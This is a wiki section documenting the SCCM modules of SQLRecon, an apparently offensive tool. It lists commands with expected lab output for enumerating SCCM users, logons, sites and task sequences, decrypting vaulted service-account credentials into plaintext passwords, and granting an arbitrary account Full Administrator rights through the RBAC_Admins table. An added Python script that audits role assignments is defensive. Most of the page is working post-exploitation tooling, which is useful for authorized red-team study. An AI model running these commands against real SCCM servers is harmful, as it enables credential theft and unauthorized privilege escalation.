7. SCCM Modules
SCCM modules are effective when you are able to interact with an SCCM server that exposes its Microsoft SQL Server database, either locally or remotely.
SCCM modules support impersonation, with the exception of DecryptCredentials. An example is provided in the users module command below (`/i:sa`).
```
SQLRecon.exe /auth:WinToken /i:sa /host:MECM01 /database:CM_KAW /module:users
```
Expected output:
```
[*] High-Level SCCM User Listing:
| LogonName             | AdminID  | SourceSite | DistinguishedName                             |
| --------------------- | -------- | ---------- | --------------------------------------------- |
| KAWALABS\mssccm_svc   | 16777217 | KAW        |                                               |
| KAWALABS\SCCM Support | 16777218 | KAW        | CN=SCCM Support,CN=Users,DC=kawalabs,DC=local |
| KAWALABS\JSmith       | 16777229 | KAW        |                                               |
| KAWALABS\ACon         | 16777230 | KAW        |                                               |
[*] Detailed Permissions:
| LogonName             | RoleName                |
| --------------------- | ----------------------- |
| KAWALABS\mssccm_svc   | Full Administrator      |
| KAWALABS\SCCM Support | Read-only Analyst       |
| KAWALABS\SCCM Support | Remote Tools Operator   |
| KAWALABS\SCCM Support | Software Update Manager |
| KAWALABS\JSmith       | Full Administrator      |
| KAWALABS\ACon         | Full Administrator      |
```
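The users module output above is also useful on the defensive side: the script below is an added example, not part of SQLRecon or this wiki, that parses that output and reports every role assignment an approved baseline does not cover, together with the AdminID that the RemoveAdmin cleanup command on this page takes. The sample output is constructed from the tables above and the baseline is a hypothetical allow-list; matching is case-insensitive because SCCM stores logon names with varying case (`ACon` vs `acon` on this page).

```python
# Constructed sample of the two tables printed by /module:users on this page.
SAMPLE_OUTPUT = r"""
[*] High-Level SCCM User Listing:
| LogonName | AdminID | SourceSite | DistinguishedName |
| --------- | ------- | ---------- | ----------------- |
| KAWALABS\mssccm_svc | 16777217 | KAW | |
| KAWALABS\JSmith | 16777229 | KAW | |
| KAWALABS\ACon | 16777230 | KAW | |
[*] Detailed Permissions:
| LogonName | RoleName |
| KAWALABS\mssccm_svc | Full Administrator |
| KAWALABS\JSmith | Full Administrator |
| KAWALABS\ACon | Full Administrator |
"""
# Constructed baseline (hypothetical): logon name -> roles it is approved to hold.
BASELINE = {
    r"KAWALABS\mssccm_svc": {"Full Administrator"},
    r"KAWALABS\JSmith": {"Read-only Analyst"},
}

def parse_sections(text):
    """Group the pipe-delimited rows under the '[*] ...' title line that precedes them."""
    sections, title, header = {}, "", None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[*]"):
            title, header = line[3:].strip().rstrip(":"), None
        elif line.startswith("|") and title:
            cells = [c.strip() for c in line.strip("|").split("|")]
            if all(set(c) <= {"-"} for c in cells):
                continue  # separator row under a header
            if header is None:
                header = cells
            else:
                sections.setdefault(title, []).append(dict(zip(header, cells)))
    return sections

def audit_roles(text, baseline):
    """Return (logon, AdminID, role, reason) for each role assignment outside the baseline."""
    sections = parse_sections(text)
    admin_ids = {r["LogonName"].lower(): r["AdminID"] for r in sections.get("High-Level SCCM User Listing", [])}
    approved = {k.lower(): v for k, v in baseline.items()}
    findings = []
    for row in sections.get("Detailed Permissions", []):
        logon, role = row["LogonName"], row["RoleName"]
        roles = approved.get(logon.lower())
        if roles is None or role not in roles:
            reason = "account not in baseline" if roles is None else "role not approved for account"
            findings.append((logon, admin_ids.get(logon.lower(), "?"), role, reason))
    return findings
```

Run `audit_roles(SAMPLE_OUTPUT, BASELINE)` against the sample and it reports JSmith (unapproved Full Administrator) and ACon (not in the baseline at all), each with its AdminID.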
```
SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:sites
```
Expected output:
```
| ServerName            | SiteCode | AccessType | ADSiteName              | IPSubnets   | IsProtected | IPv6Prefixes | ServerRemoteName      | IsDP | IsSMP |
| --------------------- | -------- | ---------- | ----------------------- | ----------- | ----------- | ------------ | --------------------- | ---- | ----- |
| MECM01.KAWALABS.LOCAL | KAW      | 0          | Default-First-Site-Name | 172.16.10.0 | 0           |              | MECM01.kawalabs.local | True | False |
```
```
SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:logons
```
Expected output:
```
| IP_Addr       | Host            | User            |
| ------------- | --------------- | --------------- |
| 172.16.10.110 | DESKTOP-LF8Q3C6 | KAWALABS\jsmith |
| 172.16.10.103 | MECM01          | KAWALABS\jsmith |
| 172.16.10.102 | SQL02           | KAWALABS\admin  |
```
```
SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:tasklist
```
Expected output:
```
| PkgID    | Name                     |
| -------- | ------------------------ |
| KAW00005 | Install CrowdStrike      |
| KAW00006 | Install Cisco Anyconnect |
| KAW00007 | Install MFA Soft Token   |
```
```
SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:taskdata
```
Expected output:
```
[*] Gathered encrypted task sequence blob.
|-> Task Sequence ID: KAW00005
|-> Task Sequence Name: Install CrowdStrike
|-> Attempting to decrypt task data:
<sequence version="3.10"/>
[*] Gathered encrypted task sequence blob.
|-> Task Sequence ID: KAW00006
|-> Task Sequence Name: Install Cisco Anyconnect
|-> Attempting to decrypt task data:
<sequence version="3.10"/>
[*] Gathered encrypted task sequence blob.
|-> Task Sequence ID: KAW00007
|-> Task Sequence Name: Install MFA Soft Token
|-> Attempting to decrypt task data:
<sequence version="3.10"/>
```
```
SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:credentials
```
Expected output:
```
| UserName            | Usage                                                                           |
| ------------------- | ------------------------------------------------------------------------------- |
| KAWALABS\mssccm_svc | <AccountUsages><UsageName>SMS_CLIENT_CONFIG_MANAGER</UsageName></AccountUsages> |
```
```
SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:decryptcredentials
```
Expected output:
```
[*] Identified vaulted SCCM credential:
|-> Username: KAWALABS\mssccm_svc
|-> Password: Password123
|-> Function: SMS_CLIENT_CONFIG_MANAGER
```
```
SQLRecon.exe /auth:WinDomain /d:KAWALABS /u:admin /p:Password123 /host:MECM01 /database:CM_KAW /module:addadmin /user:current /sid:current
```
Expected output:
```
[+] SUCCESS: Added target user to RBAC_Admins table.
[*] Use the this command to remove the account: "/database:cm_kaw /module:sRemoveAdmin /user:16777223 /remove:00000000|00000000"
[+] SUCCESS: Assigned permissions to 'KAWALABS\JSmith'. The user should now be a 'Full Administrator' in SCCM.
```
```
SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:addadmin /user:KAWALABS\acon /sid:S-1-5-21-3113994310-608060616-2731373765-1391
```
Expected output:
```
[+] SUCCESS: Added target user to RBAC_Admins table.
[*] Use the this command to remove the account: "/database:cm_kaw /module:sRemoveAdmin /user:16777224 /remove:00000000|00000000"
[+] SUCCESS: Asigned permissions to 'KAWALABS\acon'. The user should now be a 'Full Administrator' in SCCM.
```
```
SQLRecon.exe /a:windomain /d:kawalabs /u:admin /p:Password123 /database:CM_KAW /m:RemoveAdmin /user:16777224 /remove:"00000000|00000000"
```
Expected output:
```
[+] SUCCESS: Removed privileges from 16777224.
[+] SUCCESS: Removed user with AdminID of '16777224' from the 'RBAC_Admins' table.
[+] SUCCESS: All cleanup actions completed.
```